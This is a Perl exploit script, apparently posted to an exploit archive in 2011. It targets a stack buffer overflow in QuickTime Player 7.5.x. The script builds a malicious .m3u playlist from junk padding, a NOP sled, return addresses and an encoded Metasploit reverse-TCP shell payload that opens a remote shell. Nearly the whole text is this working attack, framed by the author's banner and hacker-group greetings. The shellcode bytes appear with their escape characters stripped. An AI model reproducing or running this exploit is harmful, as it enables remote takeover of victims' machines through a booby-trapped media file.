Home / exploits QuickTime Player 7.5.x Buffer Overflow
Posted on 09 March 2011
#!/usr/bin/perl ### # Title : QuickTime Player v 7.5.x (m3u) Stack Buffer Overflow # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : Windows # Impact : Remote Access and BOF # Tested on : Windows XP SP3 Français # Target : QuickTime Player v 7.5.x ### # Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print " "; print " |===========================================================| "; print " |= [!] Name : QuickTime Player v 7.5.x (m3u) / Apple Inc. =| "; print " |= [!] Exploit : Stack Buffer Overflow =| "; print " |= [!] Author : KedAns-Dz =| "; print " |= [!] Mail: Ked-h(at)hotmail(dot)com =| "; print " |===========================================================| "; sleep(2); print " "; print " [!] Please Wait Loading... "; # Payload Parameter (http://www.metasploit.com) # windows/shell_reverse_tcp - 739 bytes # Encoder: x86/alpha_mixed # LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, => my $payload = "x56x54x58x36x33x30x56x58x48x34x39x48x48x48" . "x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" . "x51x51x44x44x44x64x33x36x46x46x46x46x54x58" . "x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" . "x38x39x49x49x49x49x49x49x49x49x49x49x49x49" . "x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" . "x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" . "x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx4d" . "x38x4ex69x47x70x43x30x45x50x45x30x4dx59x4a" . "x45x45x61x48x52x43x54x4ex6bx50x52x50x30x4c" . "x4bx51x42x46x6cx4ex6bx46x32x46x74x4cx4bx50" . "x72x46x48x46x6fx4fx47x43x7ax51x36x46x51x49" . "x6fx46x51x4fx30x4ex4cx47x4cx43x51x43x4cx43" . "x32x44x6cx47x50x4fx31x48x4fx46x6dx43x31x49" . "x57x48x62x4cx30x51x42x42x77x4cx4bx50x52x42" . "x30x4cx4bx43x72x45x6cx46x61x4ax70x4cx4bx43" . "x70x43x48x4ex65x4bx70x42x54x50x4ax45x51x48" . "x50x46x30x4ex6bx50x48x45x48x4ex6bx51x48x51" . "x30x45x51x48x53x48x63x47x4cx43x79x4ex6bx47" . "x44x4ex6bx46x61x4bx66x50x31x4bx4fx44x71x4f" . "x30x4ex4cx49x51x4ax6fx46x6dx46x61x4fx37x46" . "x58x4dx30x42x55x4ax54x46x63x43x4dx4cx38x47" . "x4bx51x6dx44x64x44x35x49x72x43x68x4cx4bx50" . "x58x45x74x47x71x48x53x51x76x4ex6bx46x6cx42" . "x6bx4cx4bx42x78x47x6cx45x51x48x53x4ex6bx45" . "x54x4cx4bx47x71x48x50x4fx79x42x64x44x64x47" . "x54x51x4bx51x4bx43x51x50x59x43x6ax46x31x4b" . "x4fx4dx30x50x58x43x6fx43x6ax4cx4bx45x42x48" . "x6bx4ex66x43x6dx42x48x50x33x44x72x45x50x43" . "x30x51x78x42x57x42x53x46x52x43x6fx50x54x43" . "x58x42x6cx44x37x44x66x45x57x49x6fx48x55x48" . "x38x4cx50x47x71x45x50x47x70x47x59x4bx74x51" . "x44x42x70x42x48x44x69x4dx50x42x4bx43x30x49" . "x6fx48x55x50x50x42x70x50x50x42x70x47x30x42" . "x70x43x70x50x50x43x58x48x6ax44x4fx49x4fx4d" . "x30x49x6fx4bx65x4ex69x48x47x42x48x43x4fx45" . "x50x43x30x47x71x43x58x43x32x45x50x44x51x43" . "x6cx4ex69x4ax46x51x7ax42x30x51x46x43x67x42" . "x48x4dx49x4ex45x51x64x51x71x49x6fx4ex35x50" . "x68x42x43x42x4dx42x44x47x70x4cx49x48x63x51" . "x47x51x47x51x47x50x31x4bx46x51x7ax47x62x51" . "x49x50x56x4dx32x49x6dx50x66x4fx37x42x64x46" . "x44x45x6cx47x71x43x31x4cx4dx50x44x51x34x42" . "x30x4ax66x43x30x43x74x50x54x42x70x43x66x43" . "x66x51x46x47x36x46x36x42x6ex50x56x46x36x42" . "x73x43x66x50x68x44x39x48x4cx47x4fx4bx36x4b" . "x4fx48x55x4cx49x4bx50x50x4ex42x76x43x76x49" . "x6fx50x30x42x48x43x38x4cx47x47x6dx43x50x49" . "x6fx4ex35x4fx4bx4ax50x4dx65x4dx72x51x46x51" . "x78x4dx76x4ex75x4fx4dx4dx4dx4bx4fx48x55x47" . "x4cx46x66x43x4cx45x5ax4bx30x49x6bx49x70x43" . "x45x45x55x4dx6bx51x57x44x53x43x42x42x4fx51" . "x7ax47x70x46x33x4bx4fx49x45x41x41"; #_ End Payload _ # Parameter OverFlow => my $eip = pack('V',0x7C86467B); # Jump ESP from kernel32.dll my $usmh = "x90" x (50 - length($eip)); # Pack Length x 50 my $ret = pack('V',0x040904b0); # Jump to ESP from QTOControl.dll $junk = "x41" x 333 ; # Junk # immiXing Parameters >>> $kedans = $junk.$usmh.$ret.$payload ; # Evil KedAns # >> Creating ... open (FILE ,"> Bo0M.m3u"); print FILE $kedans ; print " File successfully created! " or die print " OpsS! File is Not Created !! "; close (FILE); #================[ Exploited By KedAns-Dz * HST-Dz * ]========================= # GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One # XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ; # > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers < # My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others # 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ... # sec4ever.com members Dz : =>> # Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others # hotturks.org : TeX * KadaVra ... all Others # Kelvin.Xgr ( kelvinx.net) #===========================================================================
